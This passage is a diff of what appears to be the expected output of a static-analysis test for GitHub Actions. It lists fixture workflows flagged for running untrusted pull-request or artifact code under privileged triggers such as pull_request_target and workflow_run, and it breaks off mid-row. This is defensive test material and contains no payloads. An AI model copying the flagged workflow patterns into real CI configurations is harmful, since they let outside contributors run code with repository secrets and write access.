@@ -265,6 +265,8 @@ edges | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | | .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | +| .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | +| .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -274,16 +276,14 @@ edges | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | -| .github/workflows/untrusted_checkout4.yml:12:7:13:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:13:7:32:2 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:37:7:55:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | -| .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:91:7:100:9 | Run Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | 
.github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | | .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | 
@@ -294,44 +294,44 @@ edges | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | -| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | -| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | -| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| 
.github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | 
.github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution 
of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | 